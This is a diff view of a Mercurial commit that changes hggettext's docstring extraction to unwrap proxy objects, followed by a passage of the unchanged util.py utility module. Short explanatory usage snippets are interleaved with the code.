i18n: use saved object to get actual function information if available...
FUJIWARA Katsunori - r33817:ed04d725 default
@@ -1,159 +1,161 @@
1 1 #!/usr/bin/env python
2 2 #
3 3 # hggettext - carefully extract docstrings for Mercurial
4 4 #
5 5 # Copyright 2009 Matt Mackall <mpm@selenic.com> and others
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 # The normalize function is taken from pygettext which is distributed
11 11 # with Python under the Python License, which is GPL compatible.
12 12
13 13 """Extract docstrings from Mercurial commands.
14 14
15 15 Compared to pygettext, this script knows about the cmdtable and table
16 16 dictionaries used by Mercurial, and will only extract docstrings from
17 17 functions mentioned therein.
18 18
19 19 Use xgettext as normal to extract strings marked as translatable and
20 20 join the message catalogs to get the final catalog.
21 21 """
22 22
23 23 from __future__ import absolute_import, print_function
24 24
25 25 import inspect
26 26 import os
27 27 import re
28 28 import sys
29 29
30 30
31 31 def escape(s):
32 32 # The order is important, the backslash must be escaped first
33 33 # since the other replacements introduce new backslashes
34 34 # themselves.
35 35 s = s.replace('\\', '\\\\')
36 36 s = s.replace('\n', '\\n')
37 37 s = s.replace('\r', '\\r')
38 38 s = s.replace('\t', '\\t')
39 39 s = s.replace('"', '\\"')
40 40 return s
41 41
42 42
43 43 def normalize(s):
44 44 # This converts the various Python string types into a format that
45 45 # is appropriate for .po files, namely much closer to C style.
46 46 lines = s.split('\n')
47 47 if len(lines) == 1:
48 48 s = '"' + escape(s) + '"'
49 49 else:
50 50 if not lines[-1]:
51 51 del lines[-1]
52 52 lines[-1] = lines[-1] + '\n'
53 53 lines = map(escape, lines)
54 54 lineterm = '\\n"\n"'
55 55 s = '""\n"' + lineterm.join(lines) + '"'
56 56 return s
57 57
58 58
59 59 def poentry(path, lineno, s):
60 60 return ('#: %s:%d\n' % (path, lineno) +
61 61 'msgid %s\n' % normalize(s) +
62 62 'msgstr ""\n')
63 63
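For reference, a sketch of what these helpers emit (the path and line number are hypothetical): a single-line docstring becomes one quoted msgid, while multi-line docstrings use the `""` continuation form produced by normalize().

```python
print(poentry('mercurial/commands.py', 42, 'add the specified files'))
# #: mercurial/commands.py:42
# msgid "add the specified files"
# msgstr ""

print(poentry('mercurial/commands.py', 50, 'line one\nline two\n'))
# #: mercurial/commands.py:50
# msgid ""
# "line one\n"
# "line two\n"
# msgstr ""
```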
64 64 doctestre = re.compile(r'^ +>>> ', re.MULTILINE)
65 65
66 66 def offset(src, doc, name, default):
67 67 """Compute offset or issue a warning on stdout."""
68 68 # remove doctest part, in order to avoid backslash mismatching
69 69 m = doctestre.search(doc)
70 70 if m:
71 71 doc = doc[:m.start()]
72 72
73 73 # Backslashes in doc appear doubled in src.
74 74 end = src.find(doc.replace('\\', '\\\\'))
75 75 if end == -1:
76 76 # This can happen if the docstring contains unnecessary escape
77 77 # sequences such as \" in a triple-quoted string. The problem
78 78 # is that \" is turned into " and so doc won't appear in src.
79 79 sys.stderr.write("warning: unknown offset in %s, assuming %d lines\n"
80 80 % (name, default))
81 81 return default
82 82 else:
83 83 return src.count('\n', 0, end)
84 84
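A minimal illustration of offset() with hypothetical inputs; it simply counts the newlines in src before the point where the docstring text begins:

```python
src = 'def add(ui, repo):\n    """add the specified files"""\n'
# the docstring body starts one line below the def line
assert offset(src, 'add the specified files', 'commands.py.add', 1) == 1
```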
85 85
86 86 def importpath(path):
87 87 """Import a path like foo/bar/baz.py and return the baz module."""
88 88 if path.endswith('.py'):
89 89 path = path[:-3]
90 90 if path.endswith('/__init__'):
91 91 path = path[:-9]
92 92 path = path.replace('/', '.')
93 93 mod = __import__(path)
94 94 for comp in path.split('.')[1:]:
95 95 mod = getattr(mod, comp)
96 96 return mod
97 97
98 98
99 99 def docstrings(path):
100 100 """Extract docstrings from path.
101 101
102 102 This respects the Mercurial cmdtable/table convention and will
103 103 only extract docstrings from functions mentioned in these tables.
104 104 """
105 105 mod = importpath(path)
106 106 if mod.__doc__:
107 107 src = open(path).read()
108 108 lineno = 1 + offset(src, mod.__doc__, path, 7)
109 109 print(poentry(path, lineno, mod.__doc__))
110 110
111 111 functions = list(getattr(mod, 'i18nfunctions', []))
112 112 functions = [(f, True) for f in functions]
113 113
114 114 cmdtable = getattr(mod, 'cmdtable', {})
115 115 if not cmdtable:
116 116 # Maybe we are processing mercurial.commands?
117 117 cmdtable = getattr(mod, 'table', {})
118 118 functions.extend((c[0], False) for c in cmdtable.itervalues())
119 119
120 120 for func, rstrip in functions:
121 121 if func.__doc__:
122 docobj = func # this might be a proxy to provide formatted doc
123 func = getattr(func, '_origfunc', func)
122 124 funcmod = inspect.getmodule(func)
123 125 extra = ''
124 126 if funcmod.__package__ == funcmod.__name__:
125 127 extra = '/__init__'
126 128 actualpath = '%s%s.py' % (funcmod.__name__.replace('.', '/'), extra)
127 129
128 130 src = inspect.getsource(func)
129 131 name = "%s.%s" % (actualpath, func.__name__)
130 132 lineno = inspect.getsourcelines(func)[1]
131 doc = func.__doc__
132 origdoc = getattr(func, '_origdoc', '')
133 doc = docobj.__doc__
134 origdoc = getattr(docobj, '_origdoc', '')
133 135 if rstrip:
134 136 doc = doc.rstrip()
135 137 origdoc = origdoc.rstrip()
136 138 if origdoc:
137 139 lineno += offset(src, origdoc, name, 1)
138 140 else:
139 141 lineno += offset(src, doc, name, 1)
140 142 print(poentry(actualpath, lineno, doc))
141 143
142 144
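The docobj/_origfunc handling added above lets a cmdtable entry be a proxy object that carries a formatted __doc__ while still pointing back at the real function for inspect purposes. A minimal sketch of such a proxy (the class name is hypothetical; only the _origfunc/_origdoc attributes are what docstrings() actually probes for):

```python
class docproxy(object):
    """Hypothetical wrapper exposing a reformatted docstring."""
    def __init__(self, func, formatteddoc):
        self._origfunc = func         # real function: inspect.getsource() works
        self._origdoc = func.__doc__  # docstring exactly as written in source
        self.__doc__ = formatteddoc   # text that should land in the catalog

def mycmd(ui, repo):
    """original docstring"""

entry = docproxy(mycmd, 'original docstring (formatted)')
# docstrings() reads entry.__doc__/_origdoc for the message text, but
# unwraps entry._origfunc before calling inspect.getsourcelines().
```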
143 145 def rawtext(path):
144 146 src = open(path).read()
145 147 print(poentry(path, 1, src))
146 148
147 149
148 150 if __name__ == "__main__":
149 151 # It is very important that we import the Mercurial modules from
150 152 # the source tree where hggettext is executed. Otherwise we might
151 153 # accidentally import and extract strings from a Mercurial
152 154 # installation mentioned in PYTHONPATH.
153 155 sys.path.insert(0, os.getcwd())
154 156 from mercurial import demandimport; demandimport.enable()
155 157 for path in sys.argv[1:]:
156 158 if path.endswith('.txt'):
157 159 rawtext(path)
158 160 else:
159 161 docstrings(path)
@@ -1,3761 +1,3763 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import os
30 30 import platform as pyplatform
31 31 import re as remod
32 32 import shutil
33 33 import signal
34 34 import socket
35 35 import stat
36 36 import string
37 37 import subprocess
38 38 import sys
39 39 import tempfile
40 40 import textwrap
41 41 import time
42 42 import traceback
43 43 import warnings
44 44 import zlib
45 45
46 46 from . import (
47 47 encoding,
48 48 error,
49 49 i18n,
50 50 policy,
51 51 pycompat,
52 52 )
53 53
54 54 base85 = policy.importmod(r'base85')
55 55 osutil = policy.importmod(r'osutil')
56 56 parsers = policy.importmod(r'parsers')
57 57
58 58 b85decode = base85.b85decode
59 59 b85encode = base85.b85encode
60 60
61 61 cookielib = pycompat.cookielib
62 62 empty = pycompat.empty
63 63 httplib = pycompat.httplib
64 64 httpserver = pycompat.httpserver
65 65 pickle = pycompat.pickle
66 66 queue = pycompat.queue
67 67 socketserver = pycompat.socketserver
68 68 stderr = pycompat.stderr
69 69 stdin = pycompat.stdin
70 70 stdout = pycompat.stdout
71 71 stringio = pycompat.stringio
72 72 urlerr = pycompat.urlerr
73 73 urlreq = pycompat.urlreq
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 # workaround for win32mbcs
77 77 _filenamebytestr = pycompat.bytestr
78 78
79 79 def isatty(fp):
80 80 try:
81 81 return fp.isatty()
82 82 except AttributeError:
83 83 return False
84 84
85 85 # glibc determines buffering on first write to stdout - if we replace a
86 86 # TTY-destined stdout with a pipe-destined stdout (e.g. a pager), we want
87 87 # line buffering
88 88 if isatty(stdout):
89 89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90 90
91 91 if pycompat.osname == 'nt':
92 92 from . import windows as platform
93 93 stdout = platform.winstdout(stdout)
94 94 else:
95 95 from . import posix as platform
96 96
97 97 _ = i18n._
98 98
99 99 bindunixsocket = platform.bindunixsocket
100 100 cachestat = platform.cachestat
101 101 checkexec = platform.checkexec
102 102 checklink = platform.checklink
103 103 copymode = platform.copymode
104 104 executablepath = platform.executablepath
105 105 expandglobs = platform.expandglobs
106 106 explainexit = platform.explainexit
107 107 findexe = platform.findexe
108 108 gethgcmd = platform.gethgcmd
109 109 getuser = platform.getuser
110 110 getpid = os.getpid
111 111 groupmembers = platform.groupmembers
112 112 groupname = platform.groupname
113 113 hidewindow = platform.hidewindow
114 114 isexec = platform.isexec
115 115 isowner = platform.isowner
116 116 listdir = osutil.listdir
117 117 localpath = platform.localpath
118 118 lookupreg = platform.lookupreg
119 119 makedir = platform.makedir
120 120 nlinks = platform.nlinks
121 121 normpath = platform.normpath
122 122 normcase = platform.normcase
123 123 normcasespec = platform.normcasespec
124 124 normcasefallback = platform.normcasefallback
125 125 openhardlinks = platform.openhardlinks
126 126 oslink = platform.oslink
127 127 parsepatchoutput = platform.parsepatchoutput
128 128 pconvert = platform.pconvert
129 129 poll = platform.poll
130 130 popen = platform.popen
131 131 posixfile = platform.posixfile
132 132 quotecommand = platform.quotecommand
133 133 readpipe = platform.readpipe
134 134 rename = platform.rename
135 135 removedirs = platform.removedirs
136 136 samedevice = platform.samedevice
137 137 samefile = platform.samefile
138 138 samestat = platform.samestat
139 139 setbinary = platform.setbinary
140 140 setflags = platform.setflags
141 141 setsignalhandler = platform.setsignalhandler
142 142 shellquote = platform.shellquote
143 143 spawndetached = platform.spawndetached
144 144 split = platform.split
145 145 sshargs = platform.sshargs
146 146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 147 statisexec = platform.statisexec
148 148 statislink = platform.statislink
149 149 testpid = platform.testpid
150 150 umask = platform.umask
151 151 unlink = platform.unlink
152 152 username = platform.username
153 153
154 154 try:
155 155 recvfds = osutil.recvfds
156 156 except AttributeError:
157 157 pass
158 158 try:
159 159 setprocname = osutil.setprocname
160 160 except AttributeError:
161 161 pass
162 162
163 163 # Python compatibility
164 164
165 165 _notset = object()
166 166
167 167 # disable Python's problematic floating point timestamps (issue4836)
168 168 # (Python hypocritically says you shouldn't change this behavior in
169 169 # libraries, and sure enough Mercurial is not a library.)
170 170 os.stat_float_times(False)
171 171
172 172 def safehasattr(thing, attr):
173 173 return getattr(thing, attr, _notset) is not _notset
174 174
175 175 def bitsfrom(container):
176 176 bits = 0
177 177 for bit in container:
178 178 bits |= bit
179 179 return bits
180 180
181 181 # Python 2.6 still has deprecation warnings enabled by default. We do not want
182 182 # to display anything to the standard user, so detect whether we are running
183 183 # tests and only enable Python deprecation warnings in that case.
184 184 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
185 185 if _dowarn:
186 186 # explicitly unfilter our warning for python 2.7
187 187 #
188 188 # The option of setting PYTHONWARNINGS in the test runner was investigated.
189 189 # However, module name set through PYTHONWARNINGS was exactly matched, so
190 190 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
191 191 # makes the whole PYTHONWARNINGS thing useless for our usecase.
192 192 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
193 193 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
194 194 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
195 195
196 196 def nouideprecwarn(msg, version, stacklevel=1):
197 197 """Issue an python native deprecation warning
198 198
199 199 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
200 200 """
201 201 if _dowarn:
202 202 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
203 203 " update your code.)") % version
204 204 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
205 205
206 206 DIGESTS = {
207 207 'md5': hashlib.md5,
208 208 'sha1': hashlib.sha1,
209 209 'sha512': hashlib.sha512,
210 210 }
211 211 # List of digest types from strongest to weakest
212 212 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
213 213
214 214 for k in DIGESTS_BY_STRENGTH:
215 215 assert k in DIGESTS
216 216
217 217 class digester(object):
218 218 """helper to compute digests.
219 219
220 220 This helper can be used to compute one or more digests given their name.
221 221
222 222 >>> d = digester(['md5', 'sha1'])
223 223 >>> d.update('foo')
224 224 >>> [k for k in sorted(d)]
225 225 ['md5', 'sha1']
226 226 >>> d['md5']
227 227 'acbd18db4cc2f85cedef654fccc4a4d8'
228 228 >>> d['sha1']
229 229 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
230 230 >>> digester.preferred(['md5', 'sha1'])
231 231 'sha1'
232 232 """
233 233
234 234 def __init__(self, digests, s=''):
235 235 self._hashes = {}
236 236 for k in digests:
237 237 if k not in DIGESTS:
238 238 raise Abort(_('unknown digest type: %s') % k)
239 239 self._hashes[k] = DIGESTS[k]()
240 240 if s:
241 241 self.update(s)
242 242
243 243 def update(self, data):
244 244 for h in self._hashes.values():
245 245 h.update(data)
246 246
247 247 def __getitem__(self, key):
248 248 if key not in DIGESTS:
249 249 raise Abort(_('unknown digest type: %s') % key)
250 250 return self._hashes[key].hexdigest()
251 251
252 252 def __iter__(self):
253 253 return iter(self._hashes)
254 254
255 255 @staticmethod
256 256 def preferred(supported):
257 257 """returns the strongest digest type in both supported and DIGESTS."""
258 258
259 259 for k in DIGESTS_BY_STRENGTH:
260 260 if k in supported:
261 261 return k
262 262 return None
263 263
264 264 class digestchecker(object):
265 265 """file handle wrapper that additionally checks content against a given
266 266 size and digests.
267 267
268 268 d = digestchecker(fh, size, {'md5': '...'})
269 269
270 270 When multiple digests are given, all of them are validated.
271 271 """
272 272
273 273 def __init__(self, fh, size, digests):
274 274 self._fh = fh
275 275 self._size = size
276 276 self._got = 0
277 277 self._digests = dict(digests)
278 278 self._digester = digester(self._digests.keys())
279 279
280 280 def read(self, length=-1):
281 281 content = self._fh.read(length)
282 282 self._digester.update(content)
283 283 self._got += len(content)
284 284 return content
285 285
286 286 def validate(self):
287 287 if self._size != self._got:
288 288 raise Abort(_('size mismatch: expected %d, got %d') %
289 289 (self._size, self._got))
290 290 for k, v in self._digests.items():
291 291 if v != self._digester[k]:
292 292 # i18n: first parameter is a digest name
293 293 raise Abort(_('%s mismatch: expected %s, got %s') %
294 294 (k, v, self._digester[k]))
295 295
296 296 try:
297 297 buffer = buffer
298 298 except NameError:
299 299 def buffer(sliceable, offset=0, length=None):
300 300 if length is not None:
301 301 return memoryview(sliceable)[offset:offset + length]
302 302 return memoryview(sliceable)[offset:]
303 303
304 304 closefds = pycompat.osname == 'posix'
305 305
306 306 _chunksize = 4096
307 307
308 308 class bufferedinputpipe(object):
309 309 """a manually buffered input pipe
310 310
311 311 Python will not let us use buffered IO and lazy reading with 'polling' at
312 312 the same time. We cannot probe the buffer state and select will not detect
313 313 that data are ready to read if they are already buffered.
314 314
315 315 This class lets us work around that by implementing its own buffering
316 316 (allowing efficient readline) while offering a way to know if the buffer is
317 317 empty from the output (allowing collaboration of the buffer with polling).
318 318
319 319 This class lives in the 'util' module because it makes use of the 'os'
320 320 module from the python stdlib.
321 321 """
322 322
323 323 def __init__(self, input):
324 324 self._input = input
325 325 self._buffer = []
326 326 self._eof = False
327 327 self._lenbuf = 0
328 328
329 329 @property
330 330 def hasbuffer(self):
331 331 """True is any data is currently buffered
332 332
333 333 This will be used externally a pre-step for polling IO. If there is
334 334 already data then no polling should be set in place."""
335 335 return bool(self._buffer)
336 336
337 337 @property
338 338 def closed(self):
339 339 return self._input.closed
340 340
341 341 def fileno(self):
342 342 return self._input.fileno()
343 343
344 344 def close(self):
345 345 return self._input.close()
346 346
347 347 def read(self, size):
348 348 while (not self._eof) and (self._lenbuf < size):
349 349 self._fillbuffer()
350 350 return self._frombuffer(size)
351 351
352 352 def readline(self, *args, **kwargs):
353 353 if 1 < len(self._buffer):
354 354 # this should not happen because both read and readline end with a
355 355 # _frombuffer call that collapses it.
356 356 self._buffer = [''.join(self._buffer)]
357 357 self._lenbuf = len(self._buffer[0])
358 358 lfi = -1
359 359 if self._buffer:
360 360 lfi = self._buffer[-1].find('\n')
361 361 while (not self._eof) and lfi < 0:
362 362 self._fillbuffer()
363 363 if self._buffer:
364 364 lfi = self._buffer[-1].find('\n')
365 365 size = lfi + 1
366 366 if lfi < 0: # end of file
367 367 size = self._lenbuf
368 368 elif 1 < len(self._buffer):
369 369 # we need to take previous chunks into account
370 370 size += self._lenbuf - len(self._buffer[-1])
371 371 return self._frombuffer(size)
372 372
373 373 def _frombuffer(self, size):
374 374 """return at most 'size' data from the buffer
375 375
376 376 The data are removed from the buffer."""
377 377 if size == 0 or not self._buffer:
378 378 return ''
379 379 buf = self._buffer[0]
380 380 if 1 < len(self._buffer):
381 381 buf = ''.join(self._buffer)
382 382
383 383 data = buf[:size]
384 384 buf = buf[len(data):]
385 385 if buf:
386 386 self._buffer = [buf]
387 387 self._lenbuf = len(buf)
388 388 else:
389 389 self._buffer = []
390 390 self._lenbuf = 0
391 391 return data
392 392
393 393 def _fillbuffer(self):
394 394 """read data to the buffer"""
395 395 data = os.read(self._input.fileno(), _chunksize)
396 396 if not data:
397 397 self._eof = True
398 398 else:
399 399 self._lenbuf += len(data)
400 400 self._buffer.append(data)
401 401
402 402 def popen2(cmd, env=None, newlines=False):
403 403 # Setting bufsize to -1 lets the system decide the buffer size.
404 404 # The default for bufsize is 0, meaning unbuffered. This leads to
405 405 # poor performance on Mac OS X: http://bugs.python.org/issue4194
406 406 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
407 407 close_fds=closefds,
408 408 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
409 409 universal_newlines=newlines,
410 410 env=env)
411 411 return p.stdin, p.stdout
412 412
413 413 def popen3(cmd, env=None, newlines=False):
414 414 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
415 415 return stdin, stdout, stderr
416 416
417 417 def popen4(cmd, env=None, newlines=False, bufsize=-1):
418 418 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
419 419 close_fds=closefds,
420 420 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
421 421 stderr=subprocess.PIPE,
422 422 universal_newlines=newlines,
423 423 env=env)
424 424 return p.stdin, p.stdout, p.stderr, p
425 425
426 426 def version():
427 427 """Return version information if available."""
428 428 try:
429 429 from . import __version__
430 430 return __version__.version
431 431 except ImportError:
432 432 return 'unknown'
433 433
434 434 def versiontuple(v=None, n=4):
435 435 """Parses a Mercurial version string into an N-tuple.
436 436
437 437 The version string to be parsed is specified with the ``v`` argument.
438 438 If it isn't defined, the current Mercurial version string will be parsed.
439 439
440 440 ``n`` can be 2, 3, or 4. Here is how some version strings map to
441 441 returned values:
442 442
443 443 >>> v = '3.6.1+190-df9b73d2d444'
444 444 >>> versiontuple(v, 2)
445 445 (3, 6)
446 446 >>> versiontuple(v, 3)
447 447 (3, 6, 1)
448 448 >>> versiontuple(v, 4)
449 449 (3, 6, 1, '190-df9b73d2d444')
450 450
451 451 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
452 452 (3, 6, 1, '190-df9b73d2d444+20151118')
453 453
454 454 >>> v = '3.6'
455 455 >>> versiontuple(v, 2)
456 456 (3, 6)
457 457 >>> versiontuple(v, 3)
458 458 (3, 6, None)
459 459 >>> versiontuple(v, 4)
460 460 (3, 6, None, None)
461 461
462 462 >>> v = '3.9-rc'
463 463 >>> versiontuple(v, 2)
464 464 (3, 9)
465 465 >>> versiontuple(v, 3)
466 466 (3, 9, None)
467 467 >>> versiontuple(v, 4)
468 468 (3, 9, None, 'rc')
469 469
470 470 >>> v = '3.9-rc+2-02a8fea4289b'
471 471 >>> versiontuple(v, 2)
472 472 (3, 9)
473 473 >>> versiontuple(v, 3)
474 474 (3, 9, None)
475 475 >>> versiontuple(v, 4)
476 476 (3, 9, None, 'rc+2-02a8fea4289b')
477 477 """
478 478 if not v:
479 479 v = version()
480 480 parts = remod.split('[\+-]', v, 1)
481 481 if len(parts) == 1:
482 482 vparts, extra = parts[0], None
483 483 else:
484 484 vparts, extra = parts
485 485
486 486 vints = []
487 487 for i in vparts.split('.'):
488 488 try:
489 489 vints.append(int(i))
490 490 except ValueError:
491 491 break
492 492 # (3, 6) -> (3, 6, None)
493 493 while len(vints) < 3:
494 494 vints.append(None)
495 495
496 496 if n == 2:
497 497 return (vints[0], vints[1])
498 498 if n == 3:
499 499 return (vints[0], vints[1], vints[2])
500 500 if n == 4:
501 501 return (vints[0], vints[1], vints[2], extra)
502 502
503 503 # used by parsedate
504 504 defaultdateformats = (
505 505 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
506 506 '%Y-%m-%dT%H:%M', # without seconds
507 507 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
508 508 '%Y-%m-%dT%H%M', # without seconds
509 509 '%Y-%m-%d %H:%M:%S', # our common legal variant
510 510 '%Y-%m-%d %H:%M', # without seconds
511 511 '%Y-%m-%d %H%M%S', # without :
512 512 '%Y-%m-%d %H%M', # without seconds
513 513 '%Y-%m-%d %I:%M:%S%p',
514 514 '%Y-%m-%d %H:%M',
515 515 '%Y-%m-%d %I:%M%p',
516 516 '%Y-%m-%d',
517 517 '%m-%d',
518 518 '%m/%d',
519 519 '%m/%d/%y',
520 520 '%m/%d/%Y',
521 521 '%a %b %d %H:%M:%S %Y',
522 522 '%a %b %d %I:%M:%S%p %Y',
523 523 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
524 524 '%b %d %H:%M:%S %Y',
525 525 '%b %d %I:%M:%S%p %Y',
526 526 '%b %d %H:%M:%S',
527 527 '%b %d %I:%M:%S%p',
528 528 '%b %d %H:%M',
529 529 '%b %d %I:%M%p',
530 530 '%b %d %Y',
531 531 '%b %d',
532 532 '%H:%M:%S',
533 533 '%I:%M:%S%p',
534 534 '%H:%M',
535 535 '%I:%M%p',
536 536 )
537 537
538 538 extendeddateformats = defaultdateformats + (
539 539 "%Y",
540 540 "%Y-%m",
541 541 "%b",
542 542 "%b %Y",
543 543 )
544 544
545 545 def cachefunc(func):
546 546 '''cache the result of function calls'''
547 547 # XXX doesn't handle keyword args
548 548 if func.__code__.co_argcount == 0:
549 549 cache = []
550 550 def f():
551 551 if len(cache) == 0:
552 552 cache.append(func())
553 553 return cache[0]
554 554 return f
555 555 cache = {}
556 556 if func.__code__.co_argcount == 1:
557 557 # we gain a small amount of time because
558 558 # we don't need to pack/unpack the list
559 559 def f(arg):
560 560 if arg not in cache:
561 561 cache[arg] = func(arg)
562 562 return cache[arg]
563 563 else:
564 564 def f(*args):
565 565 if args not in cache:
566 566 cache[args] = func(*args)
567 567 return cache[args]
568 568
569 569 return f
570 570
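A quick usage sketch of cachefunc (the wrapped function is hypothetical; per the XXX above, keyword arguments are not part of the cache key):

```python
calls = []
def expensive(x):
    calls.append(x)  # record real invocations
    return x * 2

fast = cachefunc(expensive)
fast(3)
fast(3)  # served from the cache, expensive() is not called again
fast(4)
assert calls == [3, 4]
```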
571 571 class sortdict(collections.OrderedDict):
572 572 '''a simple sorted dictionary
573 573
574 574 >>> d1 = sortdict([('a', 0), ('b', 1)])
575 575 >>> d2 = d1.copy()
576 576 >>> d2
577 577 sortdict([('a', 0), ('b', 1)])
578 578 >>> d2.update([('a', 2)])
579 579 >>> d2.keys() # should still be in last-set order
580 580 ['b', 'a']
581 581 '''
582 582
583 583 def __setitem__(self, key, value):
584 584 if key in self:
585 585 del self[key]
586 586 super(sortdict, self).__setitem__(key, value)
587 587
588 588 if pycompat.ispypy:
589 589 # __setitem__() isn't called as of PyPy 5.8.0
590 590 def update(self, src):
591 591 if isinstance(src, dict):
592 592 src = src.iteritems()
593 593 for k, v in src:
594 594 self[k] = v
595 595
596 596 class transactional(object):
597 597 """Base class for making a transactional type into a context manager."""
598 598 __metaclass__ = abc.ABCMeta
599 599
600 600 @abc.abstractmethod
601 601 def close(self):
602 602 """Successfully closes the transaction."""
603 603
604 604 @abc.abstractmethod
605 605 def release(self):
606 606 """Marks the end of the transaction.
607 607
608 608 If the transaction has not been closed, it will be aborted.
609 609 """
610 610
611 611 def __enter__(self):
612 612 return self
613 613
614 614 def __exit__(self, exc_type, exc_val, exc_tb):
615 615 try:
616 616 if exc_type is None:
617 617 self.close()
618 618 finally:
619 619 self.release()
620 620
621 621 @contextlib.contextmanager
622 622 def acceptintervention(tr=None):
623 623 """A context manager that closes the transaction on InterventionRequired
624 624
625 625 If no transaction was provided, this simply runs the body and returns
626 626 """
627 627 if not tr:
628 628 yield
629 629 return
630 630 try:
631 631 yield
632 632 tr.close()
633 633 except error.InterventionRequired:
634 634 tr.close()
635 635 raise
636 636 finally:
637 637 tr.release()
638 638
639 639 @contextlib.contextmanager
640 640 def nullcontextmanager():
641 641 yield
642 642
643 643 class _lrucachenode(object):
644 644 """A node in a doubly linked list.
645 645
646 646 Holds a reference to nodes on either side as well as a key-value
647 647 pair for the dictionary entry.
648 648 """
649 649 __slots__ = (u'next', u'prev', u'key', u'value')
650 650
651 651 def __init__(self):
652 652 self.next = None
653 653 self.prev = None
654 654
655 655 self.key = _notset
656 656 self.value = None
657 657
658 658 def markempty(self):
659 659 """Mark the node as emptied."""
660 660 self.key = _notset
661 661
662 662 class lrucachedict(object):
663 663 """Dict that caches most recent accesses and sets.
664 664
665 665 The dict consists of an actual backing dict - indexed by original
666 666 key - and a doubly linked circular list defining the order of entries in
667 667 the cache.
668 668
669 669 The head node is the newest entry in the cache. If the cache is full,
670 670 we recycle head.prev and make it the new head. Cache accesses result in
671 671 the node being moved to before the existing head and being marked as the
672 672 new head node.
673 673 """
674 674 def __init__(self, max):
675 675 self._cache = {}
676 676
677 677 self._head = head = _lrucachenode()
678 678 head.prev = head
679 679 head.next = head
680 680 self._size = 1
681 681 self._capacity = max
682 682
683 683 def __len__(self):
684 684 return len(self._cache)
685 685
686 686 def __contains__(self, k):
687 687 return k in self._cache
688 688
689 689 def __iter__(self):
690 690 # We don't have to iterate in cache order, but why not.
691 691 n = self._head
692 692 for i in range(len(self._cache)):
693 693 yield n.key
694 694 n = n.next
695 695
696 696 def __getitem__(self, k):
697 697 node = self._cache[k]
698 698 self._movetohead(node)
699 699 return node.value
700 700
701 701 def __setitem__(self, k, v):
702 702 node = self._cache.get(k)
703 703 # Replace existing value and mark as newest.
704 704 if node is not None:
705 705 node.value = v
706 706 self._movetohead(node)
707 707 return
708 708
709 709 if self._size < self._capacity:
710 710 node = self._addcapacity()
711 711 else:
712 712 # Grab the last/oldest item.
713 713 node = self._head.prev
714 714
715 715 # At capacity. Kill the old entry.
716 716 if node.key is not _notset:
717 717 del self._cache[node.key]
718 718
719 719 node.key = k
720 720 node.value = v
721 721 self._cache[k] = node
722 722 # And mark it as newest entry. No need to adjust order since it
723 723 # is already self._head.prev.
724 724 self._head = node
725 725
726 726 def __delitem__(self, k):
727 727 node = self._cache.pop(k)
728 728 node.markempty()
729 729
730 730 # Temporarily mark as newest item before re-adjusting head to make
731 731 # this node the oldest item.
732 732 self._movetohead(node)
733 733 self._head = node.next
734 734
735 735 # Additional dict methods.
736 736
737 737 def get(self, k, default=None):
738 738 try:
739 739 return self._cache[k].value
740 740 except KeyError:
741 741 return default
742 742
743 743 def clear(self):
744 744 n = self._head
745 745 while n.key is not _notset:
746 746 n.markempty()
747 747 n = n.next
748 748
749 749 self._cache.clear()
750 750
751 751 def copy(self):
752 752 result = lrucachedict(self._capacity)
753 753 n = self._head.prev
754 754 # Iterate in oldest-to-newest order, so the copy has the right ordering
755 755 for i in range(len(self._cache)):
756 756 result[n.key] = n.value
757 757 n = n.prev
758 758 return result
759 759
760 760 def _movetohead(self, node):
761 761 """Mark a node as the newest, making it the new head.
762 762
763 763 When a node is accessed, it becomes the freshest entry in the LRU
764 764 list, which is denoted by self._head.
765 765
766 766 Visually, let's make ``N`` the new head node (* denotes head):
767 767
768 768 previous/oldest <-> head <-> next/next newest
769 769
770 770 ----<->--- A* ---<->-----
771 771 | |
772 772 E <-> D <-> N <-> C <-> B
773 773
774 774 To:
775 775
776 776 ----<->--- N* ---<->-----
777 777 | |
778 778 E <-> D <-> C <-> B <-> A
779 779
780 780 This requires the following moves:
781 781
782 782 C.next = D (node.prev.next = node.next)
783 783 D.prev = C (node.next.prev = node.prev)
784 784 E.next = N (head.prev.next = node)
785 785 N.prev = E (node.prev = head.prev)
786 786 N.next = A (node.next = head)
787 787 A.prev = N (head.prev = node)
788 788 """
789 789 head = self._head
790 790 # C.next = D
791 791 node.prev.next = node.next
792 792 # D.prev = C
793 793 node.next.prev = node.prev
794 794 # N.prev = E
